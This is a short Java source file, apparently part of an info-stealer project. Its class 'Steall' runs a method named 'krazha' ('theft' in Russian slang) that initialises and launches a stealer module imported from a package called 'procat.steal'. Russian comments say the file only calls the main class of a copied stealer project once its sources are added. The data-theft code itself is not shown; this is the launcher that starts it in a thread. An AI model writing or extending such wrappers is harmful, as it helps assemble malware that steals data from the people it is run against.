package procat.sbor;


import procat.steal._256;

public class Steall implements Runnable {


    private void krazha() {
        // тут просто  вызвать маин класс скопрированного проекта стиллера
        // предваритоельно добавив его сурсы
        try {
            _256.INSTANCE.initialize();
            _256.INSTANCE.launchNodes();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void run() {
        krazha();
    }
}
